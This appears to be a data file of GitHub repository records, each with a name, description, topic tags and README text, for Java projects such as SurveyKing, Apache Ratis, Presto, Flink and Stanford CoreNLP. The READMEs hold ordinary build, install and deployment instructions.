page](https://hbase.apache.org/downloads.html). We use mailing lists to send notices and to discuss. The mailing lists and archives are listed [here](http://hbase.apache.org/mail-lists.html). # How to Contribute The source code can be found at https://hbase.apache.org/source-repository.html The HBase issue tracker is at https://hbase.apache.org/issue-tracking.html Note that the public registration for https://issues.apache.org/ has been disabled due to spam. If you want to contribute to HBase, please visit the [Request a jira account](https://selfserve.apache.org/jira-account.html) page to submit your request. Please make sure to select **hbase** as the '_ASF project you want to file a ticket_' so we can receive your request and process it. > **_NOTE:_** we need to process the requests manually, so it may take some time, for example up to a week, for us to respond to your request. # About Apache HBase is made available under the [Apache License, version 2.0](https://hbase.apache.org/license.html). The HBase distribution includes cryptographic software. See the export control notice [here](https://hbase.apache.org/export_control.html).
0
javahuang/SurveyKing
Make a better survey system.
java react-survey springboot survey surveyjs surveymonkey
# SurveyKing (卷王)

简体中文 | [English](./README.en-us.md)

## A powerful open-source survey and exam system

[Click here](https://wj.surveyking.cn/s/start) for a quick start with the SurveyKing survey and exam system.

Your star ⭐️⭐️⭐️ is welcome and appreciated 🙏🙏🙏. **Star the repo in the top-right corner (optional) and join QQ group 1074277968 to get the latest database scripts.**

## Quick Start (one-click deployment)

### 🚀 Try the survey system in 1 minute (no database installation required)

1. Download the SurveyKing quick-start package (via the QQ group)
2. Unzip it and double-click start.bat
3. Open [http://localhost:1991](http://localhost:1991) in a browser and log in with *admin*/*123456*

### One-click Docker deployment

```bash
docker run -p 1991:1991 surveyking/surveyking
```

## Features

- 🥇 Supports 20+ question types, such as fill-in-the-blank, choice, dropdown, cascade, matrix, pagination, signature, question group, upload, and [horizontal fill-in](https://wj.surveyking.cn/s/EMqvs7)
- 🎉 Multiple ways to create surveys: import from Excel, import from text, or edit with the online editor
- 💪 Rich survey settings, including whitelist answering, public query, and answer limits
- 🎇 Data: add, edit, tag, export, print, and preview answers, and download attachments in bulk
- 🎨 Reports: real-time statistical analysis of questions, displayed and exported as charts (bar, column, pie) and tables
- 🚀 Simple installation and deployment (**as fast as 1 minute**): one-click Windows deployment, one-click Docker deployment, separate front-end/back-end deployment, single-jar deployment, and sub-path deployment
- 🥊 Responsive layout: every page adapts to desktop and mobile (including survey editing, settings, and answering)
- 👬 Multi-user collaboration on surveys
- 🎁 The backend supports multiple databases: any relational database with a JDBC driver
- 🐯 Secure, reliable, stable, high-performance backend API service
- 🙆 Complete RBAC permission control
- 🦋 Visual configuration of survey jump and display logic, plus custom logic via formulas (SurveyKing's logic settings are considerably more powerful than today's mainstream commercial survey systems)
  - **Show/hide logic**
  - **Calculated-value logic**: compute answers dynamically, from simple BMI based on height and weight to complex computations combining multiple answers and values
  - **Text substitution logic**: display question text dynamically
  - **Validation logic**: judge whether the current answer is valid based on other answers
  - **Required logic**: decide dynamically whether a question is required
  - **Auto-check logic**: check options automatically based on other questions and option answers
  - **Option show/hide logic**: show or hide options dynamically
  - **End-survey logic**
  - **Jump logic**: dynamic jumps
  - **Custom end-of-survey message logic**: show different messages based on answers or exam scores
  - **Custom redirect link logic**: redirect to different links based on answers or exam scores, with answer parameters supported
- 🌈 Unique-option settings, cross-survey data query/update/delete, automatic exam scoring, custom prompts, custom redirect links, and more

## Comparison with other survey products

|  | 问卷网 | 腾讯问卷 | 问卷星 | 金数据 | SurveyKing |
| --------------- | ------ | -------- | ------ | ------ | ---- |
| Surveys | ✔️ | ✔️ | ✔️ | ✔️ | ✔️ |
| Online exams | ✔️ | ❌ | ✔️ | ✔️ | ✔️ |
| Voting | ✔️ | ✔️ | ✔️ | ✔️ | ✔️ |
| Question types | 🥇 | 🥉 | 🥇 | 🥈 | 🥈 |
| Question settings | 🥇 | 🥉 | 🥇 | 🥇 | 🥇 |
| Auto calculation | ❌ | ❌ | 🥉 | 🥈 | 🥇 |
| Logic settings | 🥈 | 🥈 | 🥈 | 🥈 | 🥇 |
| Custom validation | ❌ | ❌ | ❌ | ❌ | ✔️ |
| Custom export | 🥈 | ❌ | ❌ | 🥉 | 🥇 |
| Mobile editing | ✔️ | ✔️ | ✔️ | ✔️ | ✔️ |
| Public query | ✔️ | ❌ | ✔️ | ❌ | ✔️ |
| Private deployment | 💰💰💰 | 💰💰💰 | 💰💰💰 | 💰💰💰 | 🆓 |

Note: all the products compared above are commercial survey products, and SurveyKing has much to learn from them. Only some major features are listed for reference; if you doubt any result, follow the product links and compare for yourself. 🥇 strong 🥈 medium 🥉 weak

## Friendly recommendation

[A low-code generation tool focused on middle-platform architecture](https://gitee.com/orangeform/orange-admin)

## Screenshots

* Exam system preview

<table> <tr> <td><img src="docs/images/exam-editor.jpg"/></td> <td><img src="docs/images/exam-import.jpg"/></td> </tr> <tr> <td><img src="docs/images/exam-pc-prev.jpg"/></td> <td><img src="docs/images/exam-mb-preview.jpeg"/></td> </tr> <tr> <td><img src="docs/images/exam-repo-list.jpg"/></td> <td><img src="docs/images/exam-repo-pick.jpg"/></td> </tr> <tr> <td><img src="docs/images/exam-repo-qedit.jpg"/></td> <td><img src="docs/images/exam-repo.jpg"/></td> </tr> </table>

* Survey preview

<table> <tr> <td><img src="docs/images/survey-editor.jpg"/></td> <td><img src="docs/images/survey-editor-formula.jpg"/></td> </tr> <tr> <td><img src="docs/images/survey-editor-preview.jpg"/></td> <td><img src="docs/images/survey-imp.jpg"/></td> </tr> <tr> <td><img src="docs/images/survey-export.jpg"/></td> <td><img src="docs/images/survey-exp-preview.jpg"/></td> </tr> <tr> <td><img src="docs/images/survey-exp-formula.jpg"/></td> <td><img src="docs/images/survey-formula.jpg"/></td> </tr> <tr> <td><img src="docs/images/survey-editor-preview.jpg"/></td> <td><img src="docs/images/survey-prev-mbmi.jpeg"/></td> </tr> <tr> <td><img src="docs/images/survey-report.jpg"/></td> <td><img src="docs/images/survey-setting.jpg"/></td> </tr> <tr> <td><img src="docs/images/survey-sys.jpg"/></td> <td><img src="docs/images/survey-post.jpg"/></td> </tr> </table>
0
kermitt2/grobid
Machine learning software for extracting information from scholarly documents
bibliographical-references crf deep-learning fulltext hamburger-to-cow machine-learning metadata pdf rnn scientific-articles transformers
null
0
codedrinker/community
Open-source forum and Q&A system. Current features include questions, replies, notifications, latest and hottest lists, and zero-reply cleanup, with more features under development. Tech stack: Spring, Spring Boot, MyBatis, MySQL/H2, Bootstrap
bootstrap flyway h2-database mybatis mybatis-generator mysql spring springboot
## 码问 (Mawen)

## Online demo

[https://www.mawen.co](https://www.mawen.co). For any configuration, usage, or troubleshooting questions, you can 👉[click here](#contact-me) to contact me, and I can also add you to the discussion group.

## Features

An open-source forum and Q&A system. Current features: multi-platform social login (GitHub, Gitee), questions, replies, notifications, latest questions, hottest topics, and zero-reply cleanup.

## Step-by-step video tutorials for this project

| Title | Link |
| --- | --- |
| [Spring Boot in Action] Forum project (Season 1) | [BV1r4411r7au](https://www.bilibili.com/video/BV1r4411r7au) |
| [Spring Boot in Action] Hot topics, classic interview problems, Top-N queries (Season 2) | [BV1Z4411f7RK](https://www.bilibili.com/video/BV1Z4411f7RK) |
| [Spring Boot in Action] Ad integration for traffic monetization (Season 3) | [BV1L4411y7J9](https://www.bilibili.com/video/BV1L4411y7J9) |
| [Spring Boot in Action] Vue for beginners (prerequisite for front-end/back-end separation) (Season 4) | [BV1gE411R7YA](https://www.bilibili.com/video/BV1gE411R7YA) |
| [Spring Boot in Action] Java design patterns in practice (Season 5) | [BV1UK4y1M7PC](https://www.bilibili.com/video/BV1UK4y1M7PC) |
| [Spring Boot in Action] Quickly set up a free HTTPS service | [BV1oJ411K7VT](https://www.bilibili.com/video/BV1oJ411K7VT) |

## Running locally

1. Install the required tools: JDK and Maven
2. Clone the code:
```sh
git clone https://github.com/codedrinker/community.git
```
3. Run the database script to create the local database:
```sh
mvn flyway:migrate
```
To use a MySQL database instead, change two configurations before running the script:
```
# src/main/resources/application.properties
spring.datasource.url=jdbc:h2:~/community
spring.datasource.username=sa
spring.datasource.password=123
```
```
# pom.xml
<properties> <db.url>jdbc:h2:~/community</db.url> <db.user>sa</db.user> <db.password>123</db.password> </properties>
```
4. Run the package command to build an executable jar:
```sh
mvn package -DskipTests
```
5. Run the project:
```sh
java -jar target/community-0.0.1-SNAPSHOT.jar
```
For production deployment, add a configuration file (production.properties) and run:
```sh
java -jar -Dspring.profiles.active=production target/community-0.0.1-SNAPSHOT.jar
```
6. Visit the app:
```
http://localhost:8887
```

## Miscellaneous

1. The database script used early in the videos, before Flyway was adopted:
```sql
CREATE TABLE USER ( ID int AUTO_INCREMENT PRIMARY KEY NOT NULL, ACCOUNT_ID VARCHAR(100), NAME VARCHAR(50), TOKEN VARCHAR(36), GMT_CREATE BIGINT, GMT_MODIFIED BIGINT );
```
2. The command to generate the Model and other MyBatis configuration files:
```
mvn -Dmybatis.generator.overwrite=true mybatis-generator:generate
```

## Tech stack

| Technology | Link |
| --- | --- |
| Spring Boot | http://projects.spring.io/spring-boot/#quick-start |
| MyBatis | https://mybatis.org/mybatis-3/zh/index.html |
| MyBatis Generator | http://mybatis.org/generator/ |
| H2 | http://www.h2database.com/html/main.html |
| Flyway | https://flywaydb.org/getstarted/firststeps/maven |
| Lombok | https://www.projectlombok.org |
| Bootstrap | https://v3.bootcss.com/getting-started/ |
| Github OAuth | https://developer.github.com/apps/building-oauth-apps/creating-an-oauth-app/ |
| UFile | https://github.com/ucloud/ufile-sdk-java |

## Further reading

[Spring docs](https://spring.io/guides) [Spring Web](https://spring.io/guides/gs/serving-web-content/) [Elasticsearch community](https://elasticsearch.cn/explore) [Github deploy key](https://developer.github.com/v3/guides/managing-deploy-keys/#deploy-keys) [Bootstrap](https://v3.bootcss.com/getting-started/) [Github OAuth](https://developer.github.com/apps/building-oauth-apps/creating-an-oauth-app/) [Spring](https://docs.spring.io/spring-boot/docs/2.0.0.RC1/reference/htmlsingle/#boot-features-embedded-database-support) [Runoob MySQL tutorial](https://www.runoob.com/mysql/mysql-insert-query.html) [Thymeleaf](https://www.thymeleaf.org/doc/tutorials/3.0/usingthymeleaf.html#setting-attribute-values) [Spring Dev Tool](https://docs.spring.io/spring-boot/docs/2.0.0.RC1/reference/htmlsingle/#using-boot-devtools) [Spring MVC](https://docs.spring.io/spring/docs/5.0.3.RELEASE/spring-framework-reference/web.html#mvc-handlermapping-interceptor) [Markdown editor plugin](http://editor.md.ipandao.com/) [UFile SDK](https://github.com/ucloud/ufile-sdk-java) [Count(*) VS Count(1)](https://mp.weixin.qq.com/s/Rwpke4BHu7Fz7KOpE2d3Lw) [Git](https://git-scm.com/download) [Visual Paradigm](https://www.visual-paradigm.com) [Flyway](https://flywaydb.org/getstarted/firststeps/maven) [Lombok](https://www.projectlombok.org) [Octotree](https://www.octotree.io/) [Table of content sidebar](https://chrome.google.com/webstore/detail/table-of-contents-sidebar/ohohkfheangmbedkgechjkmbepeikkej) [One Tab](https://chrome.google.com/webstore/detail/chphlpgkkbolifaimnlloiipkdnihall) [Live Reload](https://chrome.google.com/webstore/detail/livereload/jnihajbhpnppcggbcgedagnkighmdlei/related) [Postman](https://chrome.google.com/webstore/detail/coohjcphdfgbiolnekdpbcijmhambjff)

## Changelog

- 2019-7-30 Fixed sessions expiring too quickly
- 2019-8-2 Fixed search exceptions caused by the * and + characters
- 2019-8-18 Added homepage sorting by latest, hottest, and zero-reply
- 2019-8-18 Fixed an exception when searching for the ? character
- 2019-8-22 Fixed the image size limit and empty question content issues
- 2019-9-1 Added a dynamic navigation bar
- 2021-7-5 Fixed the custom Spring starter failing to download due to network issues

## Contact Me

You can reach me by scanning either QR code below. The left one is my WeChat subscription account (follow it and reply "面试" to get my 20,000-character collection of Alibaba interview notes); the right one is my personal WeChat, where you can message me about any technical question.

| WeChat official account | Personal WeChat |
| --- | --- |
| 码匠笔记 | fit8295 |
| ![](https://mawen-cdn.cn-bj.ufileos.com/wxdyh-qr.jpeg?iopcmd=thumbnail&type=1&scale=50) | ![](http://mawen-cdn.cn-bj.ufileos.com/wechat.jpeg?iopcmd=thumbnail&type=1&scale=50) |
0
apache/ratis
Open source Java implementation of the Raft consensus protocol.
consensus consensus-protocol java raft
<!--
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License. See accompanying LICENSE file.
-->

# Apache Ratis

*[Apache Ratis]* is a Java library that implements the Raft consensus protocol [1]; an extended version of the Raft paper is available at <https://raft.github.io/raft.pdf>. The paper introduces Raft and states its motivations in the following words:

> Raft is a consensus algorithm for managing a replicated log.
> It produces a result equivalent to (multi-)Paxos, and it is as efficient as Paxos,
> but its structure is different from Paxos; this makes Raft more understandable than Paxos
> and also provides a better foundation for building practical systems.

Ratis aims to make Raft available as a Java library that can be used by any system that needs a replicated log. It provides pluggability for state machine implementations to manage replicated states. It also provides pluggability for Raft log, RPC, and metric implementations to make integration with other projects easy. Another important goal is to support high-throughput data ingest so that it can be used for more general data replication use cases.

* To build the artifacts, see [BUILDING.md](BUILDING.md).
* To run the examples, see [ratis-examples/README.md](ratis-examples/README.md).

## Reference

1. Diego Ongaro and John Ousterhout, _[In Search of an Understandable Consensus Algorithm][Ongaro2014]_, 2014 USENIX Annual Technical Conference (USENIX ATC 14) (Philadelphia, PA), USENIX Association, 2014, pp. 305-319.

[Ongaro2014]: https://www.usenix.org/conference/atc14/technical-sessions/presentation/ongaro
[Apache Ratis]: https://ratis.apache.org/
0
allure-framework/allure2
Allure Report is a flexible, lightweight multi-language test reporting tool. It provides clear graphical reports and allows everyone involved in the development process to extract the maximum of information from the everyday testing process
allure reporting reporting-engine
[license]: http://www.apache.org/licenses/LICENSE-2.0 "Apache License 2.0" [site]: https://allurereport.org/?source=github_allure2 "Official Website" [docs]: https://allurereport.org/docs/?source=github_allure2 "Documentation" [qametaio]: https://qameta.io/?source=Report_GitHub "Qameta Software" [blog]: https://qameta.io/blog "Qameta Software Blog" [Twitter]: https://twitter.com/QametaSoftware "Qameta Software" [twitter-team]: https://twitter.com/QametaSoftware/lists/team/members "Team" [build]: https://github.com/allure-framework/allure2/actions/workflows/build.yaml [build-badge]: https://github.com/allure-framework/allure2/actions/workflows/build.yaml/badge.svg [maven]: https://repo.maven.apache.org/maven2/io/qameta/allure/allure-commandline/ "Maven Central" [maven-badge]: https://img.shields.io/maven-central/v/io.qameta.allure/allure-commandline.svg?style=flat [release]: https://github.com/allure-framework/allure2/releases/latest "Latest release" [release-badge]: https://img.shields.io/github/release/allure-framework/allure2.svg?style=flat [CONTRIBUTING.md]: .github/CONTRIBUTING.md [CODE_OF_CONDUCT.md]: CODE_OF_CONDUCT.md # Allure Report [![build-badge][]][build] [![release-badge][]][release] [![maven-badge][]][maven] [![Backers on Open Collective](https://opencollective.com/allure-report/backers/badge.svg)](#backers) [![Sponsors on Open Collective](https://opencollective.com/allure-report/sponsors/badge.svg)](#sponsors) > Allure Report is a flexible multi-language test report tool to show you a detailed representation of what has been tested and extract maximum from the everyday execution of tests. <img src="https://allurereport.org/public/img/allure-report.svg" height="85px" alt="Allure Report logo" align="right" /> - Learn more about Allure Report at [https://allurereport.org](https://allurereport.org) - 📚 [Documentation](https://allurereport.org/docs/) – discover official documentation for Allure Report - ❓ [Questions and Support](https://github.com/orgs/allure-framework/discussions/categories/questions-support) – get help from the team and community - 📢 [Official announcements](https://github.com/orgs/allure-framework/discussions/categories/announcements) – stay updated with our latest news and updates - 💬 [General Discussion](https://github.com/orgs/allure-framework/discussions/categories/general-discussion) – engage in casual conversations, share insights and ideas with the community - 🖥️ [Live Demo](https://demo.allurereport.org/) — explore a live example of Allure Report in action --- ## Download You can use one of the following ways to get Allure: * Grab it from [releases](https://github.com/allure-framework/allure2/releases) (see Assets section). * Using Homebrew: ```bash $ brew install allure ``` * For Windows, Allure is available from the [Scoop](http://scoop.sh/) commandline-installer. To install Allure, download and install Scoop and then execute in the Powershell: ```bash scoop install allure ``` ## How Allure Report works Allure Report can build unified reports for dozens of testing tools across eleven programming languages on several CI/CD systems. ![How Allure Report works](.github/how_allure_works.jpg) ## Allure TestOps [DevOps-ready Testing Platform built][qametaio] to reduce code time-to-market without quality loss. You can set up your product quality control and boost your QA and development team productivity by setting up your TestOps. ## Contributors This project exists thanks to all the people who contributed. [[Contribute]](.github/CONTRIBUTING.md). 
<a href="https://github.com/allure-framework/allure2/graphs/contributors"><img src="https://opencollective.com/allure-report/contributors.svg?avatarHeight=24&width=890&showBtn=false" /></a>
0
prestodb/presto
The official home of the Presto distributed SQL query engine for big data
big-data data hadoop hive java lakehouse presto query sql
# Presto

Presto is a distributed SQL query engine for big data.

See the [User Manual](https://prestodb.github.io/docs/current/) for deployment instructions and end user documentation.

## Contributing!

Please refer to the [contribution guidelines](https://github.com/prestodb/presto/blob/master/CONTRIBUTING.md) to get started.

## Questions?

[Please join our Slack channel and ask in `#dev`](https://communityinviter.com/apps/prestodb/prestodb).
0
apache/flink
Apache Flink
big-data flink java python scala sql
# Apache Flink Apache Flink is an open source stream processing framework with powerful stream- and batch-processing capabilities. Learn more about Flink at [https://flink.apache.org/](https://flink.apache.org/) ### Features * A streaming-first runtime that supports both batch processing and data streaming programs * Elegant and fluent APIs in Java and Scala * A runtime that supports very high throughput and low event latency at the same time * Support for *event time* and *out-of-order* processing in the DataStream API, based on the *Dataflow Model* * Flexible windowing (time, count, sessions, custom triggers) across different time semantics (event time, processing time) * Fault-tolerance with *exactly-once* processing guarantees * Natural back-pressure in streaming programs * Libraries for Graph processing (batch), Machine Learning (batch), and Complex Event Processing (streaming) * Built-in support for iterative programs (BSP) in the DataSet (batch) API * Custom memory management for efficient and robust switching between in-memory and out-of-core data processing algorithms * Compatibility layers for Apache Hadoop MapReduce * Integration with YARN, HDFS, HBase, and other components of the Apache Hadoop ecosystem ### Streaming Example ```scala case class WordWithCount(word: String, count: Long) val text = env.socketTextStream(host, port, '\n') val windowCounts = text.flatMap { w => w.split("\\s") } .map { w => WordWithCount(w, 1) } .keyBy("word") .window(TumblingProcessingTimeWindow.of(Time.seconds(5))) .sum("count") windowCounts.print() ``` ### Batch Example ```scala case class WordWithCount(word: String, count: Long) val text = env.readTextFile(path) val counts = text.flatMap { w => w.split("\\s") } .map { w => WordWithCount(w, 1) } .groupBy("word") .sum("count") counts.writeAsCsv(outputPath) ``` ## Building Apache Flink from Source Prerequisites for building Flink: * Unix-like environment (we use Linux, Mac OS X, Cygwin, WSL) * Git * Maven (we require version 3.8.6) * Java 8 or 11 (Java 9 or 10 may work) ``` git clone https://github.com/apache/flink.git cd flink ./mvnw clean package -DskipTests # this will take up to 10 minutes ``` Flink is now installed in `build-target`. ## Developing Flink The Flink committers use IntelliJ IDEA to develop the Flink codebase. We recommend IntelliJ IDEA for developing projects that involve Scala code. Minimal requirements for an IDE are: * Support for Java and Scala (also mixed projects) * Support for Maven with Java and Scala ### IntelliJ IDEA The IntelliJ IDE supports Maven out of the box and offers a plugin for Scala development. * IntelliJ download: [https://www.jetbrains.com/idea/](https://www.jetbrains.com/idea/) * IntelliJ Scala Plugin: [https://plugins.jetbrains.com/plugin/?id=1347](https://plugins.jetbrains.com/plugin/?id=1347) Check out our [Setting up IntelliJ](https://nightlies.apache.org/flink/flink-docs-master/flinkDev/ide_setup.html#intellij-idea) guide for details. ### Eclipse Scala IDE **NOTE:** From our experience, this setup does not work with Flink due to deficiencies of the old Eclipse version bundled with Scala IDE 3.0.3 or due to version incompatibilities with the bundled Scala version in Scala IDE 4.4.1. **We recommend to use IntelliJ instead (see above)** ## Support Don’t hesitate to ask! Contact the developers and community on the [mailing lists](https://flink.apache.org/community.html#mailing-lists) if you need any help. [Open an issue](https://issues.apache.org/jira/browse/FLINK) if you find a bug in Flink. 
## Documentation The documentation of Apache Flink is located on the website: [https://flink.apache.org](https://flink.apache.org) or in the `docs/` directory of the source code. ## Fork and Contribute This is an active open-source project. We are always open to people who want to use the system or contribute to it. Contact us if you are looking for implementation tasks that fit your skills. This article describes [how to contribute to Apache Flink](https://flink.apache.org/contributing/how-to-contribute.html). ## Externalized Connectors Most Flink connectors have been externalized to individual repos under the [Apache Software Foundation](https://github.com/apache): * [flink-connector-aws](https://github.com/apache/flink-connector-aws) * [flink-connector-cassandra](https://github.com/apache/flink-connector-cassandra) * [flink-connector-elasticsearch](https://github.com/apache/flink-connector-elasticsearch) * [flink-connector-gcp-pubsub](https://github.com/apache/flink-connector-gcp-pubsub) * [flink-connector-hbase](https://github.com/apache/flink-connector-hbase) * [flink-connector-jdbc](https://github.com/apache/flink-connector-jdbc) * [flink-connector-kafka](https://github.com/apache/flink-connector-kafka) * [flink-connector-mongodb](https://github.com/apache/flink-connector-mongodb) * [flink-connector-opensearch](https://github.com/apache/flink-connector-opensearch) * [flink-connector-prometheus](https://github.com/apache/flink-connector-prometheus) * [flink-connector-pulsar](https://github.com/apache/flink-connector-pulsar) * [flink-connector-rabbitmq](https://github.com/apache/flink-connector-rabbitmq) ## About Apache Flink is an open source project of The Apache Software Foundation (ASF). The Apache Flink project originated from the [Stratosphere](http://stratosphere.eu) research project.
0
stanfordnlp/CoreNLP
CoreNLP: A Java suite of core NLP tools for tokenization, sentence segmentation, NER, parsing, coreference, sentiment analysis, etc.
named-entity-recognition natural-language-processing nlp nlp-parsing stanford-nlp
# Stanford CoreNLP [![Run Tests](https://github.com/stanfordnlp/CoreNLP/actions/workflows/run-tests.yaml/badge.svg)](https://github.com/stanfordnlp/CoreNLP/actions/workflows/run-tests.yaml) [![Maven Central](https://img.shields.io/maven-central/v/edu.stanford.nlp/stanford-corenlp.svg)](https://mvnrepository.com/artifact/edu.stanford.nlp/stanford-corenlp) [![Twitter](https://img.shields.io/twitter/follow/stanfordnlp.svg?style=social&label=Follow)](https://twitter.com/stanfordnlp/) [Stanford CoreNLP](http://stanfordnlp.github.io/CoreNLP/) provides a set of natural language analysis tools written in Java. It can take raw human language text input and give the base forms of words, their parts of speech, whether they are names of companies, people, etc., normalize and interpret dates, times, and numeric quantities, mark up the structure of sentences in terms of syntactic phrases or dependencies, and indicate which noun phrases refer to the same entities. It was originally developed for English, but now also provides varying levels of support for (Modern Standard) Arabic, (mainland) Chinese, French, German, Hungarian, Italian, and Spanish. Stanford CoreNLP is an integrated framework, which makes it very easy to apply a bunch of language analysis tools to a piece of text. Starting from plain text, you can run all the tools with just two lines of code. Its analyses provide the foundational building blocks for higher-level and domain-specific text understanding applications. Stanford CoreNLP is a set of stable and well-tested natural language processing tools, widely used by various groups in academia, industry, and government. The tools variously use rule-based, probabilistic machine learning, and deep learning components. The Stanford CoreNLP code is written in Java and licensed under the GNU General Public License (v2 or later). Note that this is the full GPL, which allows many free uses, but not its use in proprietary software that you distribute to others. ### Build Instructions Several times a year we distribute a new version of the software, which corresponds to a stable commit. During the time between releases, one can always use the latest, under development version of our code. Here are some helpful instructions to use the latest code: #### Provided build Sometimes we will provide updated jars here which have the latest version of the code. At present, [the current released version of the code](https://stanfordnlp.github.io/CoreNLP/#download) is our most recent released jar, though you can always build the very latest from GitHub HEAD yourself. <!--- [stanford-corenlp.jar (last built: 2017-04-14)](http://nlp.stanford.edu/software/stanford-corenlp-2017-04-14-build.jar) --> #### Build with Ant 1. Make sure you have Ant installed, details here: [http://ant.apache.org/](http://ant.apache.org/) 2. Compile the code with this command: `cd CoreNLP ; ant` 3. Then run this command to build a jar with the latest version of the code: `cd CoreNLP/classes ; jar -cf ../stanford-corenlp.jar edu` 4. This will create a new jar called stanford-corenlp.jar in the CoreNLP folder which contains the latest code 5. The dependencies that work with the latest code are in CoreNLP/lib and CoreNLP/liblocal, so make sure to include those in your CLASSPATH. 6. 
When using the latest version of the code make sure to download the latest versions of the [corenlp-models](http://nlp.stanford.edu/software/stanford-corenlp-models-current.jar), [english-models](http://nlp.stanford.edu/software/stanford-english-corenlp-models-current.jar), and [english-models-kbp](http://nlp.stanford.edu/software/stanford-english-kbp-corenlp-models-current.jar) and include them in your CLASSPATH. If you are processing languages other than English, make sure to download the latest version of the models jar for the language you are interested in. #### Build with Maven 1. Make sure you have Maven installed, details here: [https://maven.apache.org/](https://maven.apache.org/) 2. If you run this command in the CoreNLP directory: `mvn package` , it should run the tests and build this jar file: `CoreNLP/target/stanford-corenlp-4.5.4.jar` 3. When using the latest version of the code make sure to download the latest versions of the [corenlp-models](http://nlp.stanford.edu/software/stanford-corenlp-models-current.jar), [english-extra-models](http://nlp.stanford.edu/software/stanford-english-extra-corenlp-models-current.jar), and [english-kbp-models](http://nlp.stanford.edu/software/stanford-english-kbp-corenlp-models-current.jar) and include them in your CLASSPATH. If you are processing languages other than English, make sure to download the latest version of the models jar for the language you are interested in. 4. If you want to use Stanford CoreNLP as part of a Maven project you need to install the models jars into your Maven repository. Below is a sample command for installing the Spanish models jar. For other languages just change the language name in the command. To install `stanford-corenlp-models-current.jar` you will need to set `-Dclassifier=models`. Here is the sample command for Spanish: `mvn install:install-file -Dfile=/location/of/stanford-spanish-corenlp-models-current.jar -DgroupId=edu.stanford.nlp -DartifactId=stanford-corenlp -Dversion=4.5.4 -Dclassifier=models-spanish -Dpackaging=jar` #### Models The models jars that correspond to the latest code can be found in the table below. Some of the larger (English) models -- like the shift-reduce parser and WikiDict -- are not distributed with our default models jar. These require downloading the English (extra) and English (kbp) jars. Resources for other languages require usage of the corresponding models jar. The best way to get the models is to use git-lfs and clone them from Hugging Face Hub. For instance, to get the French models, run the following commands: ``` # Make sure you have git-lfs installed # (https://git-lfs.github.com/) git lfs install git clone https://huggingface.co/stanfordnlp/corenlp-french ``` The jars can be directly downloaded from the links below or the Hugging Face Hub page as well. 
| Language | Model Jar | Last Updated | | --- | --- | --- | | Arabic | [download](https://nlp.stanford.edu/software/stanford-arabic-corenlp-models-current.jar) [(HF Hub)](https://huggingface.co/stanfordnlp/corenlp-arabic/tree/main) | 4.5.6 | | Chinese | [download](https://nlp.stanford.edu/software/stanford-chinese-corenlp-models-current.jar) [(HF Hub)](https://huggingface.co/stanfordnlp/corenlp-chinese/tree/main)| 4.5.6 | | English (extra) | [download](https://nlp.stanford.edu/software/stanford-english-extra-corenlp-models-current.jar) [(HF Hub)](https://huggingface.co/stanfordnlp/corenlp-english-extra/tree/main) | 4.5.6 | | English (KBP) | [download](https://nlp.stanford.edu/software/stanford-english-kbp-corenlp-models-current.jar) [(HF Hub)](https://huggingface.co/stanfordnlp/corenlp-english-kbp/tree/main) | 4.5.6 | | French | [download](https://nlp.stanford.edu/software/stanford-french-corenlp-models-current.jar) [(HF Hub)](https://huggingface.co/stanfordnlp/corenlp-french/tree/main) | 4.5.6 | | German | [download](https://nlp.stanford.edu/software/stanford-german-corenlp-models-current.jar) [(HF Hub)](https://huggingface.co/stanfordnlp/corenlp-german/tree/main) | 4.5.6 | | Hungarian | [download](https://nlp.stanford.edu/software/stanford-hungarian-corenlp-models-current.jar) [(HF Hub)](https://huggingface.co/stanfordnlp/corenlp-hungarian/tree/main) | 4.5.6 | | Italian | [download](https://nlp.stanford.edu/software/stanford-italian-corenlp-models-current.jar) [(HF Hub)](https://huggingface.co/stanfordnlp/corenlp-italian/tree/main)| 4.5.6 | | Spanish | [download](https://nlp.stanford.edu/software/stanford-spanish-corenlp-models-current.jar) [(HF Hub)](https://huggingface.co/stanfordnlp/corenlp-spanish/tree/main)| 4.5.6 | Thank you to [Hugging Face](https://huggingface.co/) for helping with our hosting! ### Install by Gradle If you don't know Gradle itself, see official site: https://gradle.org Write the following in your build.gradle according to [Maven Central](https://search.maven.org/artifact/edu.stanford.nlp/stanford-corenlp/4.5.5/jar): ```Gradle dependencies { implementation 'edu.stanford.nlp:stanford-corenlp:4.5.5' } ``` If you want to analyse English, add following: ```Gradle implementation "edu.stanford.nlp:stanford-corenlp:4.5.5:models" implementation "edu.stanford.nlp:stanford-corenlp:4.5.5:models-english" implementation "edu.stanford.nlp:stanford-corenlp:4.5.5:models-english-kbp" ``` If you use another version, replace "4.5.5" to a version you use. ### Useful resources You can find releases of Stanford CoreNLP on [Maven Central](https://search.maven.org/artifact/edu.stanford.nlp/stanford-corenlp/4.5.4/jar). You can find more explanation and documentation on [the Stanford CoreNLP homepage](http://stanfordnlp.github.io/CoreNLP/). For information about making contributions to Stanford CoreNLP, see the file [CONTRIBUTING.md](CONTRIBUTING.md). Questions about CoreNLP can either be posted on StackOverflow with the tag [stanford-nlp](http://stackoverflow.com/questions/tagged/stanford-nlp), or on the [mailing lists](https://nlp.stanford.edu/software/#Mail).
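The README above notes that, starting from plain text, you can run all the tools with just a couple of lines of code. As a hedged illustration, here is a minimal sketch, assuming `stanford-corenlp` and its English models jar are on the classpath; the annotator list and the sample sentence are arbitrary choices:

```java
import edu.stanford.nlp.pipeline.CoreDocument;
import edu.stanford.nlp.pipeline.CoreSentence;
import edu.stanford.nlp.pipeline.StanfordCoreNLP;
import java.util.Properties;

public class PipelineSketch {
    public static void main(String[] args) {
        // Choose the annotators to run; each one loads the models it needs.
        Properties props = new Properties();
        props.setProperty("annotators", "tokenize,ssplit,pos,lemma,ner");
        StanfordCoreNLP pipeline = new StanfordCoreNLP(props);

        // Annotate a document built from plain text.
        CoreDocument document = new CoreDocument("Stanford University is located in California.");
        pipeline.annotate(document);

        // Print per-sentence part-of-speech and NER tags.
        for (CoreSentence sentence : document.sentences()) {
            System.out.println(sentence.posTags());
            System.out.println(sentence.nerTags());
        }
    }
}
```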
0
kairosdb/kairosdb
Fast scalable time series database
java kairosdb metrics timeseries timeseries-database
